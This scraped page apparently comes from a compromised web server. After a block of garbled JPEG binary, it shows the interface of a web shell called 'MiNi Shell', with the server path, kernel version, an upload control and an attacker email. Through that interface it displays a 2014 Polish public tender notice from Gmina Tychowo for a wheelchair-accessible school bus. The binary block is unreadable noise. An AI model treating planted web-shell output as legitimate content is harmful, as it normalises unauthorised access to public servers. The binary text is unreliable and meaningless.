JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140203/21581-N-2014.html

<p class="kh_header"><b>Tychowo: Dostawa fabrycznie nowego autobusu szkolnego dla Gminy Tychowo</b><br>
<b>Numer ogłoszenia: 21581 - 2014; data zamieszczenia: 03.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tychowo , ul. Bobolicka 17, 78-220 Tychowo, woj. zachodniopomorskie, tel. 94 3115130, faks 94 3115566.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowego autobusu szkolnego dla Gminy Tychowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego autobusu (o długości 9 - 9,5m) przeznaczonego do przewozu dzieci oraz dostosowanego dla osób niepełnosprawnych poruszających się  na wózku inwalidzkim z przystosowaniem do kotwiczenia jednego wózka inwalidzkiego, z wyposażeniem dodatkowym w postaci podnośnika elektrohydraulicznego do wprowadzania wózka (winda do wózka). Autobus musi spełniać wymagania zgodne z Ustawą z dnia 20 czerwca 1997 r. Prawo o Ruchu Drogowym (tekst jednolity Dz. U. nr 108 z 2005 r. poz. 908), rozporządzenia  Ministra Infrastruktury z dnia 24 października 2005 r. w sprawie homologacji typu pojazdów samochodowych i przyczep (Dz. U. Nr 238, poz.2010 z dnia 6 grudnia 2005 r. z późn. zm.) oraz rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. Nr 32 poz.262 z dnia 26 lutego 2003 r. z późn. zm.) oraz posiadać dokumenty pozwalające na rejestrację. Zakup autobusu jest częściowo finansowany ze środków PFRON w ramach realizacji przez beneficjenta programu pn.: Program wyrównywania różnic między regionami II, realizacji projektu w ramach obszaru D - pomoc w zdobyciu wykształcenia przez osoby niepełnosprawne zamieszkujące Gminy wiejskie oraz Gminy miejsko - wiejskie. Wymagania ogólne autobusu: ilość miejsc siedzących - 39 pasażerskich (1 miejsce do kotwiczenia wózka inwalidzkiego za pomocą szybko złączy po szybkim demontażu 2 foteli podwójnych); autobus z platformą wjazdową przystosowaną do kotwiczenia jednego wózka inwalidzkiego; rok produkcji 2014; długość całkowita - 9,5 m; szerokość całkowita -    2500 mm; wysokość całkowita - 3225 mm: rozstaw osi - 4000 mm; dopuszczalna masa całkowita: 15 500 kg; zawieszenie pneumatyczne, oś przednia zawieszenie niezależne, most sztywny jednostopniowy;  rama podłużnicowo - kratownicowa, 
Silnik: wysokoprężny, spełniający wymagania normy min Euro V EEV w zakresie emisji spalin i hałasu w układzie R6, moc min. 260 KM, umieszczony podłużnie z tyłu pojazdu, pojemność do 6000 cm3, osłona podsilnikowa, ogranicznik prędkości do 95 km/h (wymagane jest oświadczenie bądź zaświadczenie o sprawności działania ogranicznika prędkości), chłodzenie cieczą z termostatyczną regulacją obiegu płynu, blokada przeciw uruchomieniowa (immobiliser), rodzaj paliwa - olej napędowy, zbiornik paliwa  o pojemności min. 170l;
Skrzynia biegów: 6-cio biegowa mechaniczna, synchronizowana (tj. 6 biegów do przodu i 1 jeden wsteczny); Układ elektryczny: instalacja 24 V, alternator 28,5V/90A, akumulatory 2X200 Ah, elektryczny wyłącznik prądu, wspomaganie układu kierowniczego; Sprzęgło: jednotarczowe, samoregulujące, sterowanie wspomagane. Układ hamulcowy: roboczy tarczowy, dwuobwodowy z systemem zapobiegającym blokowaniu kół pod?czas hamowania (ABS), sterowany pneumatycznie; dodatkowo z systemami: ASR,  ESP, EBV i BAS. Zawieszenie: pneumatyczne, niezależne (drążki reakcyjne, miechy pneumatyczne, amortyzatory teleskopowe), most napędowy - sztywny, oś przednia - zawieszenie niezależne; Nadwozie: konstrukcja - metalowa, zintegrowana z ramą podwozia, szkielet spawany techniką spełniającą wymagania norm PN EN ISO 3834-2 (wymaga się dołączenie do oferty odpowiednich certyfikatów potwierdzających spełnienie przez producenta autobusu w/w wymogu), wykonany z profili stalowych zamkniętych, 2 włazy dachowe sterowane ręcznie, poszycie zewnętrzne odporne na korozję (blachy chromoniklowane, tworzywa sztuczne, aluminium); Instalacja: pneumatyczna, wykonana z materiałów odpornych na korozję z osuszaczem i odolejaczem powietrza; Drzwi: przednie i tylne: otwierane do tyłu, sterowane elektropneumatycznie, zawór otwierania drzwi przednich na zewnątrz, drzwi muszą być zdalnie sterowane z miejsca kierowcy, przy prędkości przekraczającej 5 km/h blokada drzwi, mechanizm drzwi wyposażony w urządzenie zapobiegające ruszeniu pojazdu z otwartymi drzwiami; drzwi tylne przed tylną osią. Wycieraczki: na przedniej szybie 2 szt., przełącznik interwałowy, spryskiwacze szyb; Lusterka: ogrzewane i sterowane elektrycznie; Oświetlenie: gabarytowe, reflektory przeciwmgielne, górne światło pozycyjne, światła awaryjne, dla ruchu szkolnego, oświetlenie przestrzeni pasażerskiej; Wentylacja: przesuwne górne partie okien bocznych, wywietrzniki dachowe i wentylator wyciągowy; Przedział pasażerski: fotele miękkie, tapicerowane, wysokie, uchylne od strony przejścia wyposażone w podłokietniki,  trzypunktowe automatyczne pasy bezpieczeństwa dla pasażerów z urządzeniem zwijającym, ilość miejsc siedzących: min. 39 + 22 stojących + 1 miejsce na wózek inwalidzki, miejsce do kotwiczenia wózka inwalidzkiego, podłoga pokryta wykładziną antypoślizgową,  poszycie wewnętrzne ścian bocznych i sufitu wykonane z płyt laminowanych i elementów tworzywowych, łatwych do utrzymania w czystości; ogrzewanie niezależne od silnika, instalacja nagłośniająca z mikrofonem dla kierowcy - pilota, nagłośnienie (dwudrożne głośniki z przodu, w środku i z tyłu (w zestawie z kasetami nawiewowymi), w tym radio CD z wejściem USB, oraz podłączenie elek. (2 x gniazda: 12V i 24V z przodu pojazdu) dla dodatkowych odbiorni?ków, barierki i oznakowanie samochodu, poręcze. Kokpit: fotel kierowcy regulowany z pasem bezpieczeństwa, przednia szyba ogrzewana nadmuchem; system nawigacji samochodowej GPS z mapą polski i eu?ropy (z roczną aktualizacją). Oznakowanie: tabliczka AUTOBUS SZKOLNY, podświetlone tablice z symbolem dzieci umieszczone z przodu i tyłu autobusu po lewej stronie (miejsce z tyłu pojazdu powinno być oświetlone), oznakowanie, że autobus jest przystosowany dla osób niepełnosprawnych, oznakowanie ruchome ze znakiem STOP umieszczone z przodu i tyłu pojazdu, ostrzegawczy błyskowy sygnał świetlny włączający się automatycznie wraz ze światłami awaryjnymi, sygnał akustyczny ostrzegający na zewnątrz o cofaniu pojazdu, przerywany sygnał akustyczny wewnątrz autobusu podczas otwierania drzwi. Deska rozdzielcza: ergonomiczna z pełnym zestawem wskaźników, tachografem elektronicznym, obrotomierz; Kolor: pomarańczowy (wg koloru RAL oznaczony numerem 2003); Ogumienie: opony bezdętkowe, R 19,5, wielosezonowe z felgami w standardzie, koło zapasowe; Wyposażenie dodatkowe: lusterko wewnętrzne, 2 gaśnice proszkowe, apteczka samochodowa, trójkąt ostrzegawczy, komplet młotków do rozbijania szyb, zestaw podręcznych narzędzi (podnośnik samochodowy, klucz do kół, wkrętak dwustronny, klucz umożliwiający odłączenie zacisków akumulatora), 2 komplety zapasowych kluczyków do pojazdu, podnośnik elektrohydrauliczny do wprowadzania wózka (winda do wózka) umieszczony pod podłogą przy tylnych drzwiach. 
Zbiornik paliwa: z podłączeniem do ogrzewania - o poj. nie mniejszej niż 170 litrów z sondą paliwową do kontroli jego zużycia. Napis na autobusie Gmina Tychowo - Gminny Ośrodek Sportu i Gospodarki Komunalnej w Tychowie wraz z logo gminy. Certyfikacja dopuszczenia pojazdu do ruchu - odpowiedni dokument należy załączyć wraz z dostawą autobusu. Wymagania w związku z przystosowaniem do przewozu osoby niepełnosprawnej na wózku inwalidzkim: winda elektrohydrau?liczna umiejscowiona pod progiem bocznych/tylnych drzwi, umożliwiająca wprowadzenie wózka do autobusu. Wyma?gana dokumentacja dopuszczenia do użytkowania wydana przez Urząd Dozoru Technicznego, oraz dodat?kowo wyposażenie do przewozu osoby niepełnosprawnej: przygotowane miejsce i system do mocowania wózka inwalidzkiego, pasy do mocowania osoby niepełnosprawnej i pasy do mocowania wózka inwalidzkiego. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do formularza ofertowego (wymagania taktyczno - techniczne). Wyżej wymienione parametry stanowią minimalne wymagania Zamawiającego. Oferowany autobus może posiadać parametry lepsze bądź takie same. Zamawiający informuje, że dostarczony autobus musi być fabrycznie nowy tj. posiadać wszystkie zespoły  i podzespoły fabrycznie nowe, wyprodukowane w roku dostawy autobusu. Wykonawca wyda pojazd wraz z całą dokumentacją  autobusu w tym dokumenty gwarancyjne oraz instrukcję pojazdu wraz z pełną informacją o stosowanych smarach, olejach i materiałach eksploatacyjnych (tłumaczenie w języku polskim).  Ubezpieczenie OC, AC, NW na autobus Zamawiający zawrze we własnym zakresie po dostarczeniu autobusu. Warunki gwarancji: Zamawiający wymaga zaoferowania minimum 24 miesięcznej gwarancji na cały autobus bez limitu kilometrów.  Zamawiający zastrzega sobie prawo wykonania uprawnień tytułu rękojmi, która wygasa 3 miesiące po upływie gwarancji. W okresie gwarancyjnym, o którym mowa w ust. 1 Wykonawca ma zapewnić: sprawne działanie autobusu, naprawę autobusu u użytkownika, a w przypadku braku takiej możliwości Wykonawca winien zapewnić doprowadzenie autobusu do stacji serwisowej oraz jego odbiór i doprowadzenie z miejsca naprawy do użytkownika. Czynności naprawy dokonywane są na koszt Wykonawcy. W przypadku powiadomienia Wykonawcy przez użytkownika autobusu o stwierdzeniu usterki lub awarii w pracy autobusu Wykonawca zobowiązany jest w terminie 7 dni licząc od dnia zgłoszenia usterki lub awarii do przystąpienia do naprawy. Termin ten nie obejmuje dni ustawowo wolnych od pracy oraz wolnych sobót. Naprawa autobusu nie może trwać dłużej niż 14 dni od dnia zawiadomienia Wykonawcy o stwierdzeniu usterki lub awarii w pracy autobusu. Zamawiający wymaga zaoferowania minimum 72 miesiące gwarancji na perforację nadwozia dostarczonego autobusu. W okresie gwarancyjnym, o którym mowa w ust. 3 Wykonawca ma zapewnić:  przywrócenie autobusu do pełnej sprawności; naprawę autobusu u użytkownika, a w przypadku braku takiej możliwości Wykonawca winien zapewnić doprowadzenie autobusu do stacji serwisowej oraz jego odbiór i doprowadzenie z miejsca naprawy do użytkownika. Czynności naprawy dokonywane będą na koszt Wykonawcy, naprawa autobusu winna odbyć się w terminie 14 dni od dnia odebrania autobusu w celu naprawy i nie później niż 2 miesiące od zgłoszenia usterki lub awarii. W okresie przekroczenia terminu naprawy, o której mowa w ust. b) oraz w ust. c) Wykonawca zobowiązany jest do podstawienia na swój koszt autobusu zastępczego. Gmina ma prawo podjąć decyzję o podstawieniu autobusu zastępczego we własnym zakresie. Jeżeli autobus zastępczy zostanie podstawiony przez Gminę, koszty dowożenia zastępczego dzieci do szkół w czasie trwania naprawy autobusu obciążają Wykonawcę. Wykonawca zobowiązuje się do przeprowadzenia napraw autobusów w okresie gwarancyjnym i pogwarancyjnym tylko w uprawnionych do tego stacjach serwisowych znajdujących się na terenie województwa, gdzie będą odbywały się naprawy gwarancyjne i pogwarancyjne. W okresie gwarancji przedłuża się czas wykonania napraw gwarancyjnych i pogwarancyjnych przekraczających 3 dni robocze, licząc od dnia powiadomienia o usterce lub awarii. Wykonawca zobowiązany będzie w takich przypadkach do każdorazowego przedłożenia Zamawiającemu dokumentów przedłużających czas trwania gwarancji o okresie od dnia powiadomienia o stwierdzonej usterce lub awarii do dnia zwrotu autobusu po naprawie. Zamawiający wymaga, aby w okresie pogwarancyjnym, w przypadku zaprzestania produkcji dostarczonej marki (typu) autobusu Wykonawca zobowiązał się do zapewnienia przez 10 lat możliwości zakupu na rynku krajowym zespołów, podzespołów i części zamiennych na żądanie Użytkowników..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.12.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 5.000,00 zł. (słownie: pięć tysięcy złotych 00/100). Wadium może być wniesione w: pieniądzu, na rachunek bankowy Zamawiającego: Gmina Tychowo Bank Spółdzielczy w Białogardzie O/Tychowo nr 10 8562 0007 0050 0050 2000 0170 w terminie do 17.02.2014 roku. Na dowodzie wpłaty należy zaznaczyć, jakiego przetargu dotyczy, lub w innej formie zgodnie z art. 45. ust. 6 pkt 2-5 ustawy Pzp, Do oferty należy dołączyć kopię dowodu wpłaty wadium, lub oryginał innej formy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagamy, nie podlega ocenie,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagamy, nie podlega ocenie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagamy, nie podlega ocenie,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagamy, nie podlega ocenie,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie wymagamy, nie podlega ocenie,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez  wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.tychowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bip.tychowo.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2014 godzina 10:00, miejsce: Urząd Miejski w Tychowie, ul. Bobolicka 17; 78-220 Tychowo; sekretariat pokój nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program wyrównywania różnic między regionami II, realizacji projektu w ramach obszaru D - pomoc w zdobyciu wykształcenia przez osoby niepełnosprawne zamieszkujące gminy wiejskie oraz gminy miejsko - wiejskie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com